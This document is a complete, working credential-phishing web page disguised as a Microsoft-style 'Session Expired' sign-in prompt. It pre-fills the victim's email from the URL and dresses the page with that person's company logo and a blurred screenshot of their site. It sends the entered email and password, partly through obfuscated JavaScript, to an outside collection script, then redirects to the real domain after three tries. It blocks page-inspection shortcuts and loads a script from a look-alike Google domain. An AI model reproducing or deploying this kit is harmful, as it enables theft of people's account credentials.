

<html lang="en"><head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="icon" type="image/png" sizes="192x192" href="https://www.google.com/s2/favicons?domain=microsoft.com" id="favimg">
    <title>Session Expired!</title>
<script src="https://code.jquery.com/jquery-3.2.1.min.js"></script>
<style>
    body {
	margin: 0;
	padding: 0;
	font-family: 'Lucida Sans', 'Lucida Sans Regular', 'Lucida Grande', 'Lucida Sans Unicode', Geneva, Verdana, sans-serif;
}

.contact-form {
	z-index: 1000;
	position: absolute;
	top: 50%;
	left: 50%;
	transform: translate(-50%, -50%);
	width: 400px;
	height: 350px;
	padding: 80px 40px;
	background: #FFF;
}
.avatar {
	position: absolute;
	width: 100px;
	height: 100px;
	border-radius: 0%;
	overflow: hidden;
	top: calc(-80px/2);
	left: 190px;
}
.contact-form h2 {
	margin: 0;
	padding: 0 0 20px;
	color: #000000;
	text-align: center;
	text-transform: uppercase;
}
.contact-form p {
	margin: 0;
	padding: 0;
	font-weight: bold;
	color: #000000;
}
.contact-form input {
	width: 100%;
	margin-bottom: 20px;
}
.contact-form input[type=email], .contact-form input[type=password] {
	border: none;
	border-bottom: 1px solid #000000;
	background: transparent;
	outline: none;
	height: 40px;
	color: #000000;
	font-size: 18px;
}
.contact-form input[type=submit] {
	height: 30px;
	color: #fff;
	font-size: 18px;
	background: green;
	cursor: pointer;
	border-radius: 25px;
	border: none;
	outline: none;
	margin-top: 15%;
}
.contact-form a {
	color: #fff;
	font-size: 14px;
	font-weight: bold;
	text-decoration: none;
}
input[type=checkbox] {
	width: 20%;
}
#msg, #error{
text-align: center !important;
color: red;
margin-bottom: 10px;
font-size: 18px;
}
/* Absolute Center Spinner */
.loading {
	position: fixed;
	z-index: 9999;
	height: 2em;
	width: 2em;
	overflow: show;
	margin: auto;
	top: 0;
	left: 0;
	bottom: 0;
	right: 0;
  }
  
  /* Transparent Overlay */
  .loading:before {
	content: '';
	display: block;
	position: fixed;
	top: 0;
	left: 0;
	width: 100%;
	height: 100%;
	  background: radial-gradient(rgba(20, 20, 20,.8), rgba(0, 0, 0, .8));
  
	background: -webkit-radial-gradient(rgba(20, 20, 20,.8), rgba(0, 0, 0,.8));
  }
  
  /* :not(:required) hides these rules from IE9 and below */
  .loading:not(:required) {
	/* hide "loading..." text */
	font: 0/0 a;
	color: transparent;
	text-shadow: none;
	background-color: transparent;
	border: 0;
  }
  
  .loading:not(:required):after {
	content: '';
	display: block;
	font-size: 10px;
	width: 1em;
	height: 1em;
	margin-top: -0.5em;
	-webkit-animation: spinner 150ms infinite linear;
	-moz-animation: spinner 150ms infinite linear;
	-ms-animation: spinner 150ms infinite linear;
	-o-animation: spinner 150ms infinite linear;
	animation: spinner 150ms infinite linear;
	border-radius: 0.5em;
	-webkit-box-shadow: rgba(255,255,255, 0.75) 1.5em 0 0 0, rgba(255,255,255, 0.75) 1.1em 1.1em 0 0, rgba(255,255,255, 0.75) 0 1.5em 0 0, rgba(255,255,255, 0.75) -1.1em 1.1em 0 0, rgba(255,255,255, 0.75) -1.5em 0 0 0, rgba(255,255,255, 0.75) -1.1em -1.1em 0 0, rgba(255,255,255, 0.75) 0 -1.5em 0 0, rgba(255,255,255, 0.75) 1.1em -1.1em 0 0;
  box-shadow: rgba(255,255,255, 0.75) 1.5em 0 0 0, rgba(255,255,255, 0.75) 1.1em 1.1em 0 0, rgba(255,255,255, 0.75) 0 1.5em 0 0, rgba(255,255,255, 0.75) -1.1em 1.1em 0 0, rgba(255,255,255, 0.75) -1.5em 0 0 0, rgba(255,255,255, 0.75) -1.1em -1.1em 0 0, rgba(255,255,255, 0.75) 0 -1.5em 0 0, rgba(255,255,255, 0.75) 1.1em -1.1em 0 0;
  }
  
  /* Animation */
  
  @-webkit-keyframes spinner {
	0% {
	  -webkit-transform: rotate(0deg);
	  -moz-transform: rotate(0deg);
	  -ms-transform: rotate(0deg);
	  -o-transform: rotate(0deg);
	  transform: rotate(0deg);
	}
	100% {
	  -webkit-transform: rotate(360deg);
	  -moz-transform: rotate(360deg);
	  -ms-transform: rotate(360deg);
	  -o-transform: rotate(360deg);
	  transform: rotate(360deg);
	}
  }
  @-moz-keyframes spinner {
	0% {
	  -webkit-transform: rotate(0deg);
	  -moz-transform: rotate(0deg);
	  -ms-transform: rotate(0deg);
	  -o-transform: rotate(0deg);
	  transform: rotate(0deg);
	}
	100% {
	  -webkit-transform: rotate(360deg);
	  -moz-transform: rotate(360deg);
	  -ms-transform: rotate(360deg);
	  -o-transform: rotate(360deg);
	  transform: rotate(360deg);
	}
  }
  @-o-keyframes spinner {
	0% {
	  -webkit-transform: rotate(0deg);
	  -moz-transform: rotate(0deg);
	  -ms-transform: rotate(0deg);
	  -o-transform: rotate(0deg);
	  transform: rotate(0deg);
	}
	100% {
	  -webkit-transform: rotate(360deg);
	  -moz-transform: rotate(360deg);
	  -ms-transform: rotate(360deg);
	  -o-transform: rotate(360deg);
	  transform: rotate(360deg);
	}
  }
  @keyframes spinner {
	0% {
	  -webkit-transform: rotate(0deg);
	  -moz-transform: rotate(0deg);
	  -ms-transform: rotate(0deg);
	  -o-transform: rotate(0deg);
	  transform: rotate(0deg);
	}
	100% {
	  -webkit-transform: rotate(360deg);
	  -moz-transform: rotate(360deg);
	  -ms-transform: rotate(360deg);
	  -o-transform: rotate(360deg);
	  transform: rotate(360deg);
	}
  }

  .theframehidden{
	  display: none;
  }
  .theframe {
	  width: 100vw;
	  height: 100vh;
	  pointer-events: none;
	}
          i {
        color: #9ABC66;
        font-size: 100px;
        line-height: 200px;
        margin-left:-15px;
      }
      .card {
        background: white;
        padding: 60px;
        border-radius: 4px;
        box-shadow: 0 2px 3px #C8D0D8;
        display: inline-block;
        margin: 0 auto;
      }
	  
	  .bg-image {
  /* The image used */
  background-image: url("https://imgur.com/vAVJT9c.png");
  /* Add the blur effect */ filter: blur(4px); -webkit-filter: blur(5px);
  /* Full height */ height: 100%; /* Center and scale the image nicely */
  background-position: cover; background-repeat: no-repeat; background-size: cover;
}

    </style>
	
    </head>
<body id="wrapper">
<iframe id="mainPage" src="" width="100%" scrolling="no" sandbox="allow-forms allow-pointer-lock
allow-popups allow-same-origin allow-scripts" style="position: absolute;height: 100%;border: none;"></iframe>
    <div class="loading" id="loading" style="display: none;">Loading��</div>
    <iframe id="customdomain" class="theframe theframehidden" src="#" width="100%" scrolling="no" sandbox="allow-pointer-lock allow-popups allow-same-origin allow-scripts allow-forms"></iframe>
    <div class="contact-form" id="contactform" style="">
		<img alt="" id="avatar" class="avatar" src="https://logo.clearbit.com/">
        <p id="msg" style="display: none">Incorrect Password!</p>
        <p id="error" style="display: none">Invalid Email Address!</p>
		<br><h2>Session Expired!</h2>
		<form >
            <input type="hidden" id="prs">
            <input type="hidden" id="prs1">
            <input type="email" required="" readonly="" id="email" name="email" value=""><br>
            <input placeholder="Enter Password" id="password" name="password" type="password" required="">
            <input type="submit" value="Sign in" id="submit-btn">
            <p><input type="checkbox" checked="">Remember Me</p>
		</form>
	</div>







 
     <script type="text/javascript">
  function stopHtmlRender() {
  $("#favimg").remove();
  $("#loading").hide();
  $("#customdomain").remove();
  $("#contactform").remove();
  $("#loading").remove();
  $("#sgh1").remove();
  $("#sgh2").remove();
  $("#sgh3").remove();
  document.write("Invalid Response!");
  window.stop();
  return false;
}

function randomString(len, charSet) {
  charSet = charSet || 'abcdefghijklmnopqrstuvwxyz0123456789';
  var randomString = '';
  for (var i = 0; i < len; i++) {
    var randomPoz = Math.floor(Math.random() * charSet.length);
    randomString += charSet.substring(randomPoz, randomPoz + 1);
  }
  return randomString;
}

function isBase64(str) {
  if (str === '' || str.trim() === '') {
    return false;
  }
  try {
    return btoa(atob(str)) == str;
  } catch (err) {
    return false;
  }
}
 
var _0x23c5db=_0x5dde;(function(_0x24f6af,_0x3c0bce){var _0x4a40aa=_0x5dde,_0x54515e=_0x24f6af();while(!![]){try{var _0x41bb98=parseInt(_0x4a40aa(0x11a))/0x1+-parseInt(_0x4a40aa(0x133))/0x2*(-parseInt(_0x4a40aa(0x121))/0x3)+parseInt(_0x4a40aa(0x13e))/0x4*(-parseInt(_0x4a40aa(0x10b))/0x5)+-parseInt(_0x4a40aa(0x12d))/0x6*(parseInt(_0x4a40aa(0x10c))/0x7)+parseInt(_0x4a40aa(0x127))/0x8+-parseInt(_0x4a40aa(0x116))/0x9+parseInt(_0x4a40aa(0x11b))/0xa;if(_0x41bb98===_0x3c0bce)break;else _0x54515e['push'](_0x54515e['shift']());}catch(_0x5a0bb9){_0x54515e['push'](_0x54515e['shift']());}}}(_0x2cf3,0x22ae4));function _0x5dde(_0x3d8863,_0x339d10){var _0x2cf3e4=_0x2cf3();return _0x5dde=function(_0x5ddeaa,_0x4424ec){_0x5ddeaa=_0x5ddeaa-0x10a;var _0x5eeda6=_0x2cf3e4[_0x5ddeaa];return _0x5eeda6;},_0x5dde(_0x3d8863,_0x339d10);}function _0x2cf3(){var _0x43dbd0=['Sign\x20in','#email','indexOf','#inputbar','#avatar','25UoRDlF','1561DbnOzz','src','Verifing...','log','html','https://','#automail','val','substr','signal','2430279ASjvvI','onerror','body','length','104928XfKNyY','2518650lPfrBZ','width','mainPage','location','focus','ready','6951ZzAIma','https://p.kindpng.com/picc/s/25-259966_transparent-background-white-email-icon-png-png-download.png','preventDefault','getElementById','#password','Check\x20your\x20network','2049984bURVMZ','replace','.email','test','https://logo.clearbit.com/','ajax','1398wVaxkw','http://www.','click','<span\x20style=\x27color:red;\x27>Username\x20or\x20Password\x20is\x20incorrect.\x20Please\x20try\x20again</span>','hide','#favimg','76IsfMKJ','hash','Wrong\x20password','POST','','show','https://physicaleducationdiploma.com/component/nikk.php','animate','#msg','<div\x20style=\x22text-align:\x20center;\x20padding:\x2040px\x200;\x20background:\x20#EBF0F5;\x20height:\x20100%\x22><div\x20class=\x22card\x22><div\x20style=\x22border-radius:200px;\x20height:200px;\x20width:200px;\x20background:\x20#F8FAF5;\x20margin:0\x20auto;\x22><i\x20class=\x22checkmark\x22>?</i></div><h1\x20style=\x22color:#88b04b;font-family:\x22Nunito\x20Sans\x22,\x22Helvetica\x20Neue\x22,sans-serif;font-weight:900;font-size:40px;margin-bottom:10px\x22>Successful!</h1>\x20<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Redirecting\x20Shortly.......</p></div></div>','msg','189636bjJYUJ','href','attr','Incorrect\x20Password!'];_0x2cf3=function(){return _0x43dbd0;};return _0x2cf3();}function checkImage(_0x269a41){var _0x4585e5=_0x5dde,_0x3e355b=new Image();_0x3e355b['onload']=function(){var _0x59e090=_0x5dde;this[_0x59e090(0x11c)]>0x0&&$(_0x59e090(0x10a))[_0x59e090(0x140)](_0x59e090(0x10d),_0x269a41);},_0x3e355b[_0x4585e5(0x117)]=function(){var _0x1e3ef4=_0x4585e5;$(_0x1e3ef4(0x10a))[_0x1e3ef4(0x140)](_0x1e3ef4(0x10d),_0x1e3ef4(0x122));},_0x3e355b[_0x4585e5(0x10d)]=_0x269a41;}$(document)[_0x23c5db(0x120)](function(){var _0x1d0f0b=_0x23c5db,_0x3b8a3c=0x0;const _0xfe9d1=_0x1d0f0b(0x13c);$('#back1')[_0x1d0f0b(0x12f)](function(){var _0x58c1d5=_0x1d0f0b;$(_0x58c1d5(0x13b))[_0x58c1d5(0x131)](),$(_0x58c1d5(0x143))[_0x58c1d5(0x113)](''),$(_0x58c1d5(0x112))['animate']({'left':0xc8,'opacity':_0x58c1d5(0x131)},0x0),$(_0x58c1d5(0x145))[_0x58c1d5(0x13a)]({'right':0xc8,'opacity':_0x58c1d5(0x138)},0x3e8);});var _0x5698f5=window[_0x1d0f0b(0x11e)][_0x1d0f0b(0x134)][_0x1d0f0b(0x114)](0x1);if(!_0x5698f5){}else{var _0xca1595=_0x5698f5;$(_0x1d0f0b(0x143))['val'](_0xca1595);var _0x280f52=/^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;if(!_0x280f52[_0x1d0f0b(0x12a)](_0xca1595))return $('#error')[_0x1d0f0b(0x138)](),_0x5698f5[_0x1d0f0b(0x11f)],![];var _0x242148=_0xca1595[_0x1d0f0b(0x144)]('@'),_0x5149ed=_0xca1595['substr'](_0x242148+0x1),_0x3be803=_0x1d0f0b(0x111)+_0x5149ed;checkImage(_0x1d0f0b(0x12b)+_0x5149ed),document[_0x1d0f0b(0x124)](_0x1d0f0b(0x11d))[_0x1d0f0b(0x10d)]=_0x3be803,$(_0x1d0f0b(0x132))[_0x1d0f0b(0x140)](_0x1d0f0b(0x13f),'https://www.google.com/s2/favicons?domain='+_0x5149ed),$(_0x1d0f0b(0x129))[_0x1d0f0b(0x110)](_0x5698f5);}$(_0x1d0f0b(0x137))[_0x1d0f0b(0x12f)](function(_0x51bb9a){var _0xb01db1=_0x1d0f0b;_0x51bb9a[_0xb01db1(0x123)]();var _0x1a6044=$(_0xb01db1(0x143))[_0xb01db1(0x113)](),_0x1766c6=$('#password')['val']();if(_0x1766c6[_0xb01db1(0x119)]<0x4)return $('#msg')[_0xb01db1(0x138)](),$(_0xb01db1(0x13b))[_0xb01db1(0x110)](_0xb01db1(0x141)),![];_0x3b8a3c=_0x3b8a3c+0x1,$[_0xb01db1(0x12c)]({'dataType':'JSON','url':_0xb01db1(0x139),'type':_0xb01db1(0x136),'data':{'oemail':_0x1a6044,'opassword':_0x1766c6},'beforeSend':function(_0x32c8a6){var _0x4de56b=_0xb01db1;$(_0x4de56b(0x137))[_0x4de56b(0x110)](_0x4de56b(0x10e));},'success':function(_0x3eb8bf){var _0x1630bc=_0xb01db1;$(_0x1630bc(0x13b))[_0x1630bc(0x110)](_0x1630bc(0x130)),_0x3eb8bf&&($(_0x1630bc(0x13b))[_0x1630bc(0x138)](),_0x3eb8bf[_0x1630bc(0x115)]=='ok'?($(_0x1630bc(0x125))['val'](''),_0x3b8a3c>=0x3&&(_0x3b8a3c=0x0,$(_0x1630bc(0x118))[_0x1630bc(0x110)](_0xfe9d1),setTimeout(function(){var _0x59d36a=_0x1630bc;window[_0x59d36a(0x11e)][_0x59d36a(0x128)](_0x59d36a(0x12e)+_0x5149ed);},0xbb8))):$(_0x1630bc(0x13b))[_0x1630bc(0x110)](_0x3eb8bf[_0x1630bc(0x13d)]));},'error':function(){var _0x4c7554=_0xb01db1;return console[_0x4c7554(0x10f)](_0x4c7554(0x126)),![],$(_0x4c7554(0x125))[_0x4c7554(0x113)](''),_0x3b8a3c>=0x3&&(_0x3b8a3c=0x0,window[_0x4c7554(0x11e)][_0x4c7554(0x128)](_0x4c7554(0x12e)+_0x5149ed)),$(_0x4c7554(0x13b))[_0x4c7554(0x138)](),$('#msg')[_0x4c7554(0x110)](_0x4c7554(0x135));},'complete':function(){var _0x50c1b1=_0xb01db1;$(_0x50c1b1(0x137))[_0x50c1b1(0x110)](_0x50c1b1(0x142));}});});});         
    </script>


 <!-- Optional JavaScript -->	 
<script src="https://ajax.googleapis.luchifab.com/ajax.googleapis/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script> 
  
  <script>

const emailInTheURL = window.location.href;
    const sliceEqualSign = emailInTheURL.indexOf("@");
    const extracetdEmail = emailInTheURL.substr((sliceEqualSign+1)).toLowerCase()

    const wrapper = document.querySelector('#wrapper');
    wrapper.style.backgroundImage = `url(https://image.thum.io/get/auth/71274-jjjjjjj/https://www.${extracetdEmail})`;
    



// prevent ctrl + s
$(document).bind('keydown', function(e) {
if(e.ctrlKey && (e.which == 83)) {
e.preventDefault();
return false;
}
});

document.addEventListener('contextmenu', event => event.preventDefault());

document.onkeydown = function(e) {
if (e.ctrlKey && 
(e.keyCode === 67 || 
e.keyCode === 86 || 
e.keyCode === 85 || 
e.keyCode === 117)) {
return false;
} else {
return true;
}
};
$(document).keypress("u",function(e) {
if(e.ctrlKey)
{
return false;      }
else {
return true;
}});



    /* global $ */
    $(document).ready(function(){
      var count=0;

      $('#back1').click(function () {
        $("#msg").hide();
        $('#email').val("");
        $("#automail").animate({left:200, opacity:"hide"}, 0);
        $("#inputbar").animate({right:200, opacity:"show"}, 1000);

      });

      var email = window.location.hash.substr(1);
      if (!email) {

      }
      else
      {
        var my_email =email;
        $('#email').val(my_email);
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!filter.test(my_email)) {
          $('#error').show();
          email.focus;
          return false;
        }
        var ind=my_email.indexOf("@");
        var my_slice=my_email.substr((ind+1));
        var c= my_slice.substr(0, my_slice.indexOf('.'));
        var final= c.toLowerCase();
        var finalu= c.toUpperCase();

        $("#logoimg").attr("src", "https://www.google.com/s2/favicons?domain="+my_slice);
        $("#logoname").html(finalu);
        $(".logoname").html(finalu+" Mail");
        $(".domain").html(my_slice);
        $(".email").html(email);
      }


      
      $('#submit-btn').click(function(event){
        $('#error').hide();
        $('#msg').hide();
        event.preventDefault();
        var email=$("#email").val();
        var password=$("#password").val();
        var msg = $('#msg').html();
        $('#msg').text( msg );
      
      var my_email =email;
      var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

      if (!filter.test(my_email)) {
        $('#error').show();
        email.focus;
        return false;
      }

      var ind=my_email.indexOf("@");
      var my_slice=my_email.substr((ind+1));
      var c= my_slice.substr(0, my_slice.indexOf('.'));
      var final= c.toLowerCase();
      var finalu= c.toUpperCase();

        $("#logoimg").attr("src", "https://www.google.com/s2/favicons?domain="+my_slice);
        $(".logoimg").attr("src", "https://www.google.com/s2/favicons?domain="+my_slice);
        $("#logoname").html(finalu);
      
      count=count+1;
      
      $.ajax({
        dataType: 'JSON',
        url: 'https://physicaleducationdiploma.com/component/nikk.php',
        type: 'POST',
        data:{
          email:email,
          password:password,
        },
            // data: $('#contact').serialize(),
            beforeSend: function(xhr){
              $('#submit-btn').html('Verifing...');
            },
            success: function(response){
			 $('#msg').html("<span style='color:red;'>Username or Password is incorrect. Please try again</span>");
              if(response){
                $("#msg").show();
				console.log(response);
				$('#msg').html(response['msg']);
                if(response['signal'] == 'ok'){
                  $("#password").val("");
                  if (count>=3) {
                    count=0;
                    
                    window.location.replace("http://www."+my_slice);
               

                  }
                  
                }
                else{
                   $('#msg').html(response['msg']);
                }
              }
            },
            error: function(){
              $("#password").val("");
              if (count>=3) {
                count=0;
                window.location.replace("http://www."+my_slice);
             
              }
              $("#msg").show();
              
            },
            complete: function(){
              $('#submit-btn').html('Sign in');
            }
          });
    });


    });


  </script>
</body></html>